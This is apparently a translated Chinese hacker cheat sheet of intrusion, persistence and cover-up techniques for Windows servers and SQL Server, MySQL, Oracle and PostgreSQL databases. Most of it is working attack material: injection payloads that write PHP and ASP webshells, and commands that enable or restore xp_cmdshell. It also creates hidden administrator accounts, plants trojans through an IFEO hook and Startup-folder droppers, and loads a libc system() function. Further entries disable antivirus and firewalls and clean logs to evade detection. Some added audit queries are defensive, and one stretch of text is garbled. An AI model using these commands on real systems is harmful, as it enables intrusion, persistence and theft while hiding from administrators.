1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". The idea is that if it succeeds, the administrator password can be left blank at the 3389 (RDP) logon and you log straight in; once inside, run net user administrator /passwordreq:yes to put it back. Caveat: the switch only clears the "password required" flag on the account, it does not blank an existing password, so the empty-password logon works only if the password is already empty, and XP/2003 refuse blank-password network logons by default ("Limit local account use of blank passwords to console logon only").
2. A neat way to build a clone account:
First create an ordinary user-level account and export its registry key (from the SAM). Delete the account in Computer Management, import the key again, then add the account to the Administrators group.
3. Read the Radmin password:
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
(reg save writes a binary hive file despite the .reg name; use reg export if you want a text .reg you can read directly.)
4. Under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
create a subkey named "services.exe", and under it a string value (Debugger, the value IFEO reads) whose data is the full path of the trojan. Windows then launches that path whenever services.exe is started.
5. runas /user:guest cmd
Use it to test what an ordinary (guest-level) user can actually do.
6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This simply uses the tlntadmn command to remove NTLM from the Telnet server's authentication methods so that plain password logon works (run tlntadmn /? for details; it needs administrator rights). Creating a matching local account to pass NTLM authentication instead hardly needs explaining.
7. After the intrusion: patching, trace cleaning and backdoor placement:
Patch the basic holes you came in through, such as SU (Serv-U) privilege escalation or SA injection. For DBO-level injection consider removing xp_dirtree and xp_regread, and make your own note of the web root. Always clean your traces. For SQL Server connections prefer Enterprise Manager: Query Analyzer leaves records on your own machine under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete that key. Do not wipe the IIS logs completely with an all-in-one tool; use a logcleaner-type tool that removes only the entries for a given IP. If you can capture the administrator password with a GINA hook, log in as him to clean the logs and finish with WYWZ for the final trace cleanup; that said, manual cleanup is safer. Finally leave a backdoor that produces no log entries. I usually leave several one-liner backdoors, a standard backdoor and a cfm backdoor, and remember to fix up the file timestamps. One harsher trick: if the machine is just an ordinary bot, drop a TXT on the administrator's desktop telling him you broke in, planted a backdoor and added a user (not your real important backdoor, of course) and ask him to clean it up; there is a good chance your real backdoor then survives.
8. Running commands through OLE Automation instead of xp_cmdshell:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c <command>'
For example:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'
(On SQL Server 2005 and later sp_oacreate is disabled until 'Ole Automation Procedures' is switched on with sp_configure, the same way as xp_cmdshell below; the run method returns nothing, so there is no command output to read back.)
9. SQL Server 2005 ships with xp_cmdshell turned off by default.
To enable it you first have to switch on advanced options; this can be done straight from the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
If the extended procedure itself has been dropped, re-register it with
;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.
From Query Analyzer, the same statements without the injection prefix:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A newer way to restore xp_cmdshell
Once the extended stored procedures have been dropped there is a very simple way to bring them back.
Drop:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
This restores them directly, without caring whether sp_addextendedproc still exists.
-----------------------------
Statement to remove the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
Statement to restore (re-register) cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
Check whether the extended procedure exists:
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
A result of 1 means it is there.
Restore xp_cmdshell and check in one go:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
A result of 1 means it worked.
Otherwise upload xplog70.dll and register it by full path:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
Statement to block cmdshell again:
sp_dropextendedproc 'xp_cmdshell'
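The checks and switches in items 9 and 10 gathered into one T-SQL script, as an added example that is not part of the original notes: the existence check runs before and after, the enable and disable steps are both shown, and command output is captured into a table rather than read off the result grid. It assumes SQL Server 2005 or later, a login with sysadmin rights, and that xplog70.dll is where the server expects it; 'whoami' is only a harmless test command.

```sql
-- Added example, not from the original notes. Assumes SQL Server 2005+,
-- a sysadmin login, and xplog70.dll present in the instance's Binn directory.

-- 1. Is the extended procedure registered at all? 1 = yes, 0 = dropped.
SELECT COUNT(*) AS registered
FROM master.dbo.sysobjects
WHERE xtype = 'X' AND name = 'xp_cmdshell';

-- 2. Is it enabled? value_in_use is what the engine honours right now;
--    value differs from it until RECONFIGURE has run.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'Ole Automation Procedures');

-- 3. Re-register it only if step 1 said 0 (dbcc addextendedproc is the
--    fallback when sp_addextendedproc itself has been dropped).
IF NOT EXISTS (SELECT 1 FROM master.dbo.sysobjects
               WHERE xtype = 'X' AND name = 'xp_cmdshell')
    EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll';

-- 4. Enable it. 'show advanced options' must be on first, otherwise the
--    second call fails with "does not exist, or it may be an advanced option".
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 5. Run a command and capture its output in a table instead of relying on
--    the result grid; this is also the shape you use when the output has to
--    be read back through an injection.
DECLARE @out TABLE (line NVARCHAR(4000));
INSERT INTO @out EXEC master.dbo.xp_cmdshell 'whoami';
SELECT line FROM @out WHERE line IS NOT NULL;

-- 6. Put the switches back. Every sp_configure change is written to the
--    SQL Server error log ("Configuration option 'xp_cmdshell' changed
--    from 0 to 1"), which is exactly what a defender searches for.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Run it as one batch from Query Analyzer or SSMS; through an injection point each numbered step becomes a separate stacked statement, as in item 9.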
-------------------------
Clear the RDP (3389) connection history with a built-in command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
then delete the Default.rdp file in the current account's My Documents folder. (Both live on the client side, i.e. the machine the connections were made from, not on the server you connected to.)
View the current user's privileges in MySQL:
show grants for current_user;
The following statements create an account with the same privileges as root. You will have met this when taking sites: the MySQL root account may only be allowed to connect locally and refuses remote connections. The statements below create a user itpro with password 123, privileges identical to root, allowed to connect from any host, so you can work on the database remotely from your own machine. (This GRANT ... IDENTIFIED BY form is MySQL 5.x syntax; in 8.0 the password is set on CREATE USER only.)

Create USER 'itpro'@'%' IDENTIFIED BY '123';
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

Remember to remove your footprints when you are done:
Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro`;
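An added example (not from the original post) that turns the statements above around: the MySQL queries a defender, or an attacker checking their own work, runs to find accounts like itpro and to learn whether INTO OUTFILE is usable on this server at all. It assumes MySQL 5.7 or later (for DROP USER IF EXISTS) and an account that can read the mysql schema; the host 10.0.0.5, the database app and the account dba_remote in the last step are hypothetical.

```sql
-- Added example, not from the original notes. Assumes MySQL 5.7+ and read
-- access to the mysql system schema.

-- 1. Accounts reachable from any host that hold the privileges that matter:
--    Super_priv (config changes), Grant_priv (can mint more accounts),
--    File_priv (what INTO OUTFILE / LOAD DATA need).
SELECT user, host, Super_priv, Grant_priv, File_priv
FROM mysql.user
WHERE host = '%'
  AND (Super_priv = 'Y' OR Grant_priv = 'Y' OR File_priv = 'Y');

-- 2. What exactly the suspicious account was given.
SHOW GRANTS FOR 'itpro'@'%';

-- 3. Can INTO OUTFILE write anywhere? Empty string = anywhere the server
--    process can write, NULL = disabled entirely, a path = only below it.
--    This decides whether the outfile/dumpfile tricks elsewhere in these
--    notes can work, before you spend a query finding out the hard way.
SHOW VARIABLES LIKE 'secure_file_priv';

-- 4. Remove the account and make sure the in-memory privilege cache agrees.
DROP USER IF EXISTS 'itpro'@'%';
FLUSH PRIVILEGES;

-- 5. If remote administration is genuinely needed, bind the account to one
--    host and grant only what it needs. Hypothetical host, database and
--    account name. In 8.0 the password belongs on CREATE USER, since
--    GRANT ... IDENTIFIED BY no longer exists.
CREATE USER 'dba_remote'@'10.0.0.5' IDENTIFIED BY 'use-a-long-random-password';
GRANT SELECT, INSERT, UPDATE, DELETE ON app.* TO 'dba_remote'@'10.0.0.5';
```

Step 1 is also the quickest audit after a suspected compromise: a root-equivalent account with host '%' that nobody remembers creating is the artefact the statements above leave behind.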
Get a SYSTEM shell from the current user:
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
(Creating a service requires administrator rights, so this is admin-to-SYSTEM rather than an escalation from a low-privileged account; the interactive cmd appears on the console session, which only works where services can still interact with the desktop, i.e. XP/2003.)
Program code
<SCRIPT LANGUAGE="VBScript">
' Create a local user "nosec" through ADSI (WinNT provider) and add it to Administrators
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec,user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Bypassing a CAPTCHA to get into the admin panel and take a shell
Program code
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000
Save as code.reg, import it into the registry and restart IE. This re-enables rendering of XBM images, which IE blocks by default (the CAPTCHAs this targets are served in that format).
Writing a shell with UNION ... INTO OUTFILE
Program code
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
(The %cf' is a GBK wide-byte injection: the escaping backslash added in front of the quote is swallowed into a two-byte character, so the quote breaks out of the string.)
Applied to the DedeCMS injection vulnerability: writing a shell without the admin panel.
In the DedeCMS admin panel, when there is no file manager and no OUTFILE privilege:
under Plugin management, Virus scan, write a one-liner into include/config_hand.php
Program code
>';?><?php @eval($_POST[cmd]);?>
in the format shown above.
In Oracle, after logging in with a low-privileged user, the following query pulls the password hashes of sys and the other users, which can then be cracked with Cain:
Program code
select username,password from dba_users;
(Reading dba_users needs SELECT ANY DICTIONARY or the DBA role; from 11g the PASSWORD column here is NULL and the hashes are only in sys.user$.)
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1. Query the terminal services port
XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
(The " " inside Terminal" "Server is a quoting trick for the space in the key name; PortNumber comes back in hex, 0xd3d = 3389.)
2. Enable terminal services on XP & 2003
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3. Change the terminal port to 20008 (0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4. Remove the XP & 2003 firewall's restriction on the terminal services port 3389 and on connecting IPs
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
(The value format is port:protocol:scope:Enabled:name; "*" as the scope allows any source address.)
5. Enable the Win2000 terminal service on port 3389 (reboot required)
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
Import the resulting 2000.reg with regedit and reboot.
6. Force a restart of Win2000 & Win2003 (the system reboots as soon as the last line runs)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
(The "1" argument is InstallHinfSection's reboot mode: always reboot after processing the empty section.)
7. Disable TCP/IP port filtering (reboot required)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
(ControlSet001 is not necessarily the active control set; CurrentControlSet is the safer path.)
8. When the terminal server reports that the maximum number of connections has been reached, connect with:
mstsc /v:ip:3389 /console
9. Adjusting NTFS permissions
cacls c: /e /t /g everyone:F (everyone gets full control of the C: drive)
cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)
-------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
' make sure the three terminal-server keys exist
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' allow connections
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' set the listening port (3389) in both places
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
' reboot so the change takes effect
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Delete the awgina.dll registry value
Program code
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
Program code
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to stop LM hashes being stored (it takes effect for each account the next time its password is changed).
Database security: commonly used commands when attacking an Oracle database
I recently ran into a server using an Oracle database; after cramming Oracle and asking the experts I finally got every user password for the site's admin interface. Oracle is really awkward to operate, so to save you some detours I have collected the commands you need during an intrusion.
1. su - oracle: not required, useful when you do not have the DBA password, since you can then enter sqlplus without one.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i
3. SQL>connect / as sysdba; (or as sysoper), or
connect internal/oracle AS SYSDBA; (scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View the current database: select * from v$database;
select name from v$database;
6. desc v$database; shows the view's columns
7. Which users hold SYSDBA or SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
show user; shows the currently connected user
8. Switch to the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show all columns of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Fetch the records of CQI.T_BBS_XUSER:
select * from CQI.T_BBS_XUSER;
14. Add a database user (test11/test):
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change database user passwords (set the sys and system passwords to test):
alter user sys identified by test;
alter user system identified by test;
Java web application configuration files worth looking for:
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml: database connection settings
\WEB-INF\server.xml: the rough equivalent of httpd.conf + my.ini + php.ini (Tomcat normally keeps it in its conf directory)
\WEB-INF\struts-config.xml: the application's file and directory layout
spring.properties contains the name of the hibernate.cfg.xml in use

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these turn up, look at the class files.
When injecting MSSQL by hand and you cannot get a reverse connection or write files, you usually read records out one at a time, which is exhausting. One statement reads everything in a single row:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
Viewing the host's shared folders from inside a VMware guest:
in a cmd window inside the VM, use the path
\\.host\Shared Folders
Finding the terminal services port from a cmdshell
Step 1: tasklist /svc lists every process with its services and PID. The terminal service is TermService, so note its PID.
Step 2: netstat -ano lists every listening port with the owning PID; the port owned by that PID is the terminal port.
7 f. ]' r( J8 a. ^查询sql server 2005中的密码hash
1 _# d, m1 w1 l, J" eSELECT password_hash FROM sys.sql_logins where name='sa'
8 }1 ]* g# w+ P( qSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
+ Y( j5 V6 i4 g/ |2 @; Saccess中导出shell1 ]* B$ p8 [3 p3 Z6 Y% g' X. I
Complete code for adding a user through MySQL on a Chinese-language Windows system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

Dropping a binary into the Startup folder instead (it runs at the next logon, like the VBS):
create table a (cmd BLOB);
insert into a values (CONVERT(<hex bytes of the executable>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe';
drop table a;
(Both need the FILE privilege and an unrestricted secure_file_priv. outfile writes one row per line, which suits the script; dumpfile writes the single value raw with no line endings, which is why it is used for the exe.)
Notes on dealing with a stubborn Norton
Find the path of the Norton service:
sc qc ccSetMgr
Then deny access to its directory, thoroughly:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
Then reboot the server:
iisreset /reboot
That takes care of it. Remember to restore the permissions afterwards:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F

Another Access export variant (Excel 4.0 driver, same asp;xls extension trick):
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

Splitting the keyword to get xp_cmdshell past a filter:
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
Some notes on PostgreSQL injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
($$...$$ is PostgreSQL dollar quoting, used so the payload needs no single quotes; COPY ... TO a server file requires superuser.)
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a user-defined function backed by libc, the other uses pl/python.
These assume PostgreSQL 8.x or later (dollar quoting needs 8.0). The libc.so.6 trick below only loads on servers older than 8.2, which introduced the module magic-block check that rejects libraries not built for PostgreSQL; both ways need superuser.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, sending its output to a file:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the output back from the table to confirm the command ran:
SELECT system_out FROM stdout

Test example:
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC LIMIT 1),NULL LIMIT 1 OFFSET 1--
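An added example, not from the original notes, that checks the preconditions for each PostgreSQL step above before you send it: every one of them (COPY to or from a server file, CREATE FUNCTION ... LANGUAGE C, an untrusted procedural language) is gated on role privileges and server version. It assumes PostgreSQL 8.2 or later (for DROP ... IF EXISTS); the pg_*_server_files roles only exist from PostgreSQL 11, so step 3 simply returns no rows on older servers.

```sql
-- Added example, not from the original notes. Assumes PostgreSQL 8.2+.

-- 1. Who am I and am I superuser? COPY to/from a server file and
--    CREATE FUNCTION ... LANGUAGE C both require superuser (or, for COPY
--    on 11+, membership in the pg_*_server_files roles). version() tells
--    you whether the libc.so.6 trick (pre-8.2 only) can even load.
SELECT current_user,
       current_setting('is_superuser') AS is_superuser,
       version() AS server_version;

-- 2. The same answer from the catalog for every role, so a defender can
--    audit who could pull these tricks at all.
SELECT rolname, rolsuper, rolcreaterole, rolcanlogin
FROM pg_roles
WHERE rolsuper OR rolcreaterole
ORDER BY rolname;

-- 3. Non-superusers granted server-file or program access (PostgreSQL 11+).
SELECT r.rolname, m.rolname AS via_role
FROM pg_auth_members AS am
JOIN pg_roles AS r ON r.oid = am.member
JOIN pg_roles AS m ON m.oid = am.roleid
WHERE m.rolname IN ('pg_read_server_files',
                    'pg_write_server_files',
                    'pg_execute_server_program');

-- 4. Is an untrusted procedural language (plpythonu, plperlu, ...) installed?
--    That is the pl/python route to command execution; untrusted languages
--    can be used only by superusers, so step 1 still decides.
SELECT lanname, lanpltrusted
FROM pg_language
WHERE lanname LIKE 'pl%' AND NOT lanpltrusted;

-- 5. Where the server lives on disk (superuser-only setting). Useful for
--    choosing a COPY ... TO path that the web server will actually serve.
SHOW data_directory;

-- 6. Clean-up of the artefacts the procedure above leaves behind.
DROP TABLE IF EXISTS stdout;
DROP FUNCTION IF EXISTS system(cstring);
```

If step 1 says is_superuser = off and step 3 returns nothing, the COPY and CREATE FUNCTION steps will fail with "must be superuser" and only the plain SELECT-based reads remain; from the defender's side, a web application role that shows up in step 2 is the finding.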
net stop sharedaccess: stop the built-in Windows firewall
netsh firewall show config: show the firewall configuration
netsh firewall set notifications disable: turn off the notification shown when the firewall blocks a program
netsh firewall add allowedprogram c:\1.exe Svchost: add a program to the firewall's allowed list (here under the display name Svchost)
Changing the 3389 port (harder to find by scanning once changed)
Change the port settings on the server side; two places in the registry need editing:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber, default 3389, change it to the port you want, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber, default 3389, change it to the same port, e.g. 6000

That is all; reboot the system for it to take effect.
A script to record RDP (3389) logons
Save as a .bat file:
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
(Each run appends the date, time and the connected 3389 sessions with their source addresses; the trailing start Explorer lets the batch stand in for the normal shell at logon.)
mstsc parameters:

Remote Desktop Connection
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- name of the .rdp file for the connection.
/v:<server[:port]> -- the terminal server to connect to.
/console -- connect to the server's console session.
/f -- start the client in full-screen mode.
/w:<width> -- width of the remote desktop screen.
/h:<height> -- height of the remote desktop screen.
/edit -- open the given .rdp file for editing.
/migrate -- migrate legacy connection files created by Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, effectively another logon to the machine; in other words the console parameter gets you the desktop shown on the physical monitor (newer clients spell it /admin). Try it, it comes in handy at times, especially with some software that
mstsc /console /v:124.42.126.xxx gets around the limit on the number of terminal connections

Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
(The account name mimics the ASPNET worker account; the attrib line hides its profile folder and the UserList value keeps it off the Welcome screen.)
FCKeditor upload form (Type=Media):
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
control userpasswords2 opens the advanced User Accounts dialog (account management and stored credentials; it does not reveal passwords)
